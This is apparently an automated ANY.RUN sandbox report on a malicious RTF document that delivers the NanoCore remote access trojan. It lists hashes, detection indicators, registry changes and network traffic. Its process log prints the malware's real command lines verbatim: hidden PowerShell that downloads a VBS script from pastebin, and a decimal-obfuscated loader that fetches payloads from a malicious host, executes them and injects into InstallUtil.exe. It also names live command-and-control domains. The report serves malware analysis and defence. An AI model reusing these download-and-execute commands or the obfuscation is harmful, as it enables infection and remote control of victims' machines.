File name:

17cc5ab80cf22229ae31ed51367951a0

Full analysis: https://app.any.run/tasks/ca1aad7d-4c29-4c85-a443-1e1c81237dd1
Verdict: Malicious activity
Threats:

NanoCore is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework and it’s available for purchase for just $25 from its “official” website.

Malware Trends Tracker     >>>
Analysis date: July 18, 2019, 05:34:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
rat
nanocore
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

17CC5AB80CF22229AE31ED51367951A0

SHA1:

4F0B305E1A94BF66A9D4207844B3BFDFA76D5780

SHA256:

49396AD1A758120FEE92C7459CBBBB3738AA229F068C516B6919C602F7C654CE

SSDEEP:

12288:Q2gLaSYdHnVcvDsLfafj4zjVl2uvwuLFKMxmMjaccouFfm:zgLa9nO4fab0jVlpwiFhn9coH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 3232)
      • EXCEL.EXE (PID: 3872)
      • EXCEL.EXE (PID: 2868)
      • EXCEL.EXE (PID: 3460)
      • EXCEL.EXE (PID: 3928)
      • EXCEL.EXE (PID: 3244)
      • EXCEL.EXE (PID: 2944)
      • EXCEL.EXE (PID: 3688)
      • EXCEL.EXE (PID: 2420)
      • EXCEL.EXE (PID: 3132)
      • EXCEL.EXE (PID: 3992)

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3872)
      • EXCEL.EXE (PID: 3232)
      • EXCEL.EXE (PID: 2868)
      • EXCEL.EXE (PID: 3460)
      • EXCEL.EXE (PID: 3928)
      • EXCEL.EXE (PID: 3244)
      • EXCEL.EXE (PID: 3688)
      • EXCEL.EXE (PID: 2944)
      • EXCEL.EXE (PID: 2420)
      • EXCEL.EXE (PID: 3132)
      • EXCEL.EXE (PID: 3992)

    • Executes PowerShell scripts

      • EXCEL.EXE (PID: 3872)
      • EXCEL.EXE (PID: 2868)
      • EXCEL.EXE (PID: 3460)
      • EXCEL.EXE (PID: 3232)
      • EXCEL.EXE (PID: 3928)
      • EXCEL.EXE (PID: 3244)
      • EXCEL.EXE (PID: 2944)
      • EXCEL.EXE (PID: 3688)
      • EXCEL.EXE (PID: 2420)
      • EXCEL.EXE (PID: 3132)
      • EXCEL.EXE (PID: 3992)

    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 3948)
      • cmd.exe (PID: 2592)
      • cmd.exe (PID: 2324)
      • cmd.exe (PID: 2092)
      • cmd.exe (PID: 2600)
      • cmd.exe (PID: 3508)
      • cmd.exe (PID: 3612)
      • cmd.exe (PID: 2200)
      • cmd.exe (PID: 2204)
      • cmd.exe (PID: 3024)
      • cmd.exe (PID: 3192)

    • Loads the Task Scheduler COM API

      • WScript.exe (PID: 2476)
      • WScript.exe (PID: 3968)
      • WScript.exe (PID: 2220)
      • WScript.exe (PID: 3432)
      • WScript.exe (PID: 3268)
      • WScript.exe (PID: 3216)
      • WScript.exe (PID: 3716)

    • NanoCore was detected

      • InstallUtil.exe (PID: 3320)

  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 2868)
      • EXCEL.EXE (PID: 3872)
      • EXCEL.EXE (PID: 3232)
      • EXCEL.EXE (PID: 3460)
      • EXCEL.EXE (PID: 3928)
      • EXCEL.EXE (PID: 3244)
      • EXCEL.EXE (PID: 2944)
      • EXCEL.EXE (PID: 3688)
      • EXCEL.EXE (PID: 2420)
      • EXCEL.EXE (PID: 3132)
      • EXCEL.EXE (PID: 3992)
      • EXCEL.EXE (PID: 3464)

    • Creates files in the user directory

      • powershell.exe (PID: 308)
      • powershell.exe (PID: 3576)
      • powershell.exe (PID: 1824)
      • powershell.exe (PID: 3660)
      • powershell.exe (PID: 3636)
      • powershell.exe (PID: 3276)
      • powershell.exe (PID: 3272)
      • powershell.exe (PID: 3480)
      • powershell.exe (PID: 1692)
      • powershell.exe (PID: 3632)
      • cmd.exe (PID: 3468)
      • Powershell.exe (PID: 3916)
      • Powershell.exe (PID: 3644)
      • powershell.exe (PID: 2492)
      • Powershell.exe (PID: 2980)
      • Powershell.exe (PID: 2044)
      • Powershell.exe (PID: 956)
      • Powershell.exe (PID: 3152)
      • Powershell.exe (PID: 3112)
      • InstallUtil.exe (PID: 3320)

    • Executes scripts

      • cmd.exe (PID: 2592)
      • cmd.exe (PID: 2324)
      • cmd.exe (PID: 2092)
      • cmd.exe (PID: 3612)
      • cmd.exe (PID: 3508)
      • cmd.exe (PID: 3024)
      • cmd.exe (PID: 2204)
      • cmd.exe (PID: 3192)

    • Executed via WMI

      • Powershell.exe (PID: 3916)
      • cmd.exe (PID: 3468)
      • Powershell.exe (PID: 3644)
      • cmd.exe (PID: 3416)
      • cmd.exe (PID: 2960)
      • Powershell.exe (PID: 2980)
      • Powershell.exe (PID: 2044)
      • cmd.exe (PID: 3692)
      • Powershell.exe (PID: 956)
      • cmd.exe (PID: 2164)
      • Powershell.exe (PID: 3112)
      • cmd.exe (PID: 1848)
      • Powershell.exe (PID: 3152)
      • cmd.exe (PID: 2636)

    • PowerShell script executed

      • Powershell.exe (PID: 3916)
      • Powershell.exe (PID: 3644)
      • Powershell.exe (PID: 2980)
      • Powershell.exe (PID: 2044)
      • Powershell.exe (PID: 956)
      • Powershell.exe (PID: 3112)
      • Powershell.exe (PID: 3152)

    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 3312)
      • cmd.exe (PID: 1712)
      • cmd.exe (PID: 2584)
      • cmd.exe (PID: 3364)
      • cmd.exe (PID: 3816)
      • cmd.exe (PID: 4076)
      • cmd.exe (PID: 1492)

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2476)
      • WScript.exe (PID: 3968)
      • WScript.exe (PID: 2220)
      • WScript.exe (PID: 3432)
      • WScript.exe (PID: 3216)
      • WScript.exe (PID: 3268)
      • WScript.exe (PID: 3716)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3532)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3872)
      • EXCEL.EXE (PID: 3232)
      • WINWORD.EXE (PID: 3532)
      • EXCEL.EXE (PID: 2868)
      • EXCEL.EXE (PID: 3460)
      • EXCEL.EXE (PID: 3244)
      • EXCEL.EXE (PID: 2944)
      • EXCEL.EXE (PID: 3688)
      • EXCEL.EXE (PID: 2420)
      • EXCEL.EXE (PID: 3132)
      • EXCEL.EXE (PID: 3992)
      • EXCEL.EXE (PID: 3928)
      • EXCEL.EXE (PID: 3464)

    • Reads settings of System Certificates

      • powershell.exe (PID: 1824)
      • powershell.exe (PID: 3272)
      • powershell.exe (PID: 3480)
      • powershell.exe (PID: 1692)
      • powershell.exe (PID: 2492)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Author: felipemkt894
LastModifiedBy: Joselio Bonin
CreateDate: 2019:07:17 13:04:00
ModifyDate: 2019:07:17 10:07:00
RevisionNumber: 2
TotalEditTime: 2 minutes
Pages: 1
Words: 81
Characters: 466
CharactersWithSpaces: 546
InternalVersionNumber: 107
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
166
Monitored processes
89
Malicious processes
13
Suspicious processes
14

Behavior graph

Click at the process to see the details
start winword.exe no specs excel.exe no specs powershell.exe cmd.exe no specs ping.exe no specs excel.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs excel.exe no specs ping.exe no specs wscript.exe no specs wscript.exe no specs powershell.exe no specs cmd.exe no specs excel.exe no specs ping.exe no specs powershell.exe cmd.exe no specs wscript.exe no specs cmd.exe no specs taskkill.exe no specs powershell.exe cmd.exe no specs powershell.exe excel.exe no specs cmd.exe no specs ping.exe no specs cmd.exe no specs wscript.exe no specs taskkill.exe no specs powershell.exe wscript.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs taskkill.exe no specs cmd.exe no specs taskkill.exe no specs wscript.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs taskkill.exe no specs wscript.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs #NANOCORE installutil.exe installutil.exe no specs taskkill.exe no specs wscript.exe no specs installutil.exe no specs installutil.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs taskkill.exe no specs installutil.exe no specs installutil.exe no specs installutil.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
308"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/NTkwkW4i','C:\Users\Public\AvastUI.vbs')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
876ping 127.0.0.1 -n 10 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ping.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
904ping 127.0.0.1 -n 10 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ping.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
956Powershell $Mo=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,119,119,119,46,109,57,99,46,110,101,116,47,117,112,108,111,97,100,115,47,49,53,54,50,56,54,53,55,50,48,49,46,106,112,103,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,119,119,119,46,109,57,99,46,110,101,116,47,117,112,108,111,97,100,115,47,49,53,54,51,51,52,48,54,56,57,49,46,106,112,103,39,41,46,114,101,112,108,97,99,101,40,39,92,92,39,44,39,48,120,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,73,110,115,116,97,108,108,85,116,105,108,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($Mo)|IEXC:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1400"{path}"C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exePowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
.NET Framework installation utility
Exit code:
0
Version:
2.0.50727.5420 (Win7SP1.050727-5400)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\installutil.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
1492"C:\Windows\System32\cmd.exe" /c cd "%CDT%\" & taskkill /f /im WINWORD.EXE & exitC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
128
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1588ping 127.0.0.1 -n 10 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ping.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
1692"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/NTkwkW4i','C:\Users\Public\AvastUI.vbs')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1712"C:\Windows\System32\cmd.exe" /c cd "%CDT%\" & taskkill /f /im WINWORD.EXE & exitC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
128
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1824"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/NTkwkW4i','C:\Users\Public\AvastUI.vbs')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
8 373
Read events
6 979
Write events
1 346
Delete events
48

Modification events

(PID) Process:(3532) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:)$
Value:
7F292400CC0D0000010000000000000000000000
(PID) Process:(3532) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3532) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3532) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1324482590
(PID) Process:(3532) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1324482704
(PID) Process:(3532) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1324482705
(PID) Process:(3532) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
CC0D00001062168E2A3DD50100000000
(PID) Process:(3532) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:8+$
Value:
382B2400CC0D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3532) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:8+$
Value:
382B2400CC0D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3532) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
39
Text files
15
Unknown types
4

Dropped files

PID
Process
Filename
Type
3532WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRC5FF.tmp.cvr
MD5:
SHA256:
3872EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRCE7B.tmp.cvr
MD5:
SHA256:
3872EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF1C92D99DE6A0E350.TMP
MD5:
SHA256:
3232EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRD419.tmp.cvr
MD5:
SHA256:
3576powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SMA896DKF62FX04PVYPC.temp
MD5:
SHA256:
3232EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFE3F9D2AC97DD9E39.TMP
MD5:
SHA256:
2868EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRD7E1.tmp.cvr
MD5:
SHA256:
308powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MU7QECVX9A9GV55VRUM9.temp
MD5:
SHA256:
3576powershell.exeC:\Users\Public\AvastUI.vbs
MD5:
SHA256:
2868EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFF4E60BDAC3E303E6.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
41
DNS requests
14
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3916
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15633406891.jpg
CA
text
1.22 Mb
malicious
2044
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15633406891.jpg
CA
text
1.22 Mb
malicious
2980
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15633406891.jpg
CA
text
1.22 Mb
malicious
2044
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15628657201.jpg
CA
text
945 Kb
malicious
3112
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15628657201.jpg
CA
text
945 Kb
malicious
3152
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15628657201.jpg
CA
text
945 Kb
malicious
3644
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15633406891.jpg
CA
text
1.22 Mb
malicious
3644
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15628657201.jpg
CA
text
945 Kb
malicious
956
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15633406891.jpg
CA
text
1.22 Mb
malicious
3112
Powershell.exe
GET
200
158.69.18.61:80
http://www.m9c.net/uploads/15633406891.jpg
CA
text
1.22 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
308
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
3576
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
1824
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
3636
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
3660
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
3276
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
3916
Powershell.exe
158.69.18.61:80
www.m9c.net
OVH SAS
CA
malicious
2492
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
956
Powershell.exe
158.69.18.61:80
www.m9c.net
OVH SAS
CA
malicious
2980
Powershell.exe
158.69.18.61:80
www.m9c.net
OVH SAS
CA
malicious

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
malicious
www.m9c.net
  • 158.69.18.61
malicious
soucdtevoceumcuzao.duckdns.org
  • 152.253.153.118
malicious
bylgay.hopto.org
  • 152.246.81.100
malicious

Threats

PID
Process
Class
Message
3320
InstallUtil.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3320
InstallUtil.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3320
InstallUtil.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3320
InstallUtil.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3320
InstallUtil.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3320
InstallUtil.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
17cc5ab80cf22229ae31ed51367951a0